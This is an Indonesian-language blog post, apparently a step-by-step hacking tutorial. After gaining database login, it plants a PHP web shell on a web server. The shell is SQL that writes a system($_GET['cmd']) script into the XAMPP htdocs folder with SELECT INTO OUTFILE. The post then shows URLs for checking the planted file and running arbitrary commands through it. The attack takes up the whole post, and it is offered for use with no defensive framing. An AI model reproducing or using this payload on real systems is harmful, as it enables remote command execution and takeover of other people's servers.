Langkah pertama yang kudu kita lakuin setelah Login ke database, masuk ke SQL Query. gak perlu masuk database. langsung aja masuk SQL Query.
Langkah kedua, kita copas code berikut :
Langkah ketiga, langsung kita buka aja di browser. misal :
kalo hasilnya bukan 404, berarti file udah ditanem
Langkah ke-empat, kita eksekusi cmd lewat file tadi make perintah :
Langkah kedua, kita copas code berikut :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Langkah ketiga, langsung kita buka aja di browser. misal :
http://webtarget.com/cmd.php
kalo hasilnya bukan 404, berarti file udah ditanem
Langkah ke-empat, kita eksekusi cmd lewat file tadi make perintah :
http://webtarget.com/cmd.php?cmd=[command-yang-mau-dieksekusi]
selesai,,
moga bermanfaat...
Good Luck,,,
source : http://www.esc-creation.org/showthread.php?tid=6157&page=1
Greetz To : Wendyaja
Tidak ada komentar:
Posting Komentar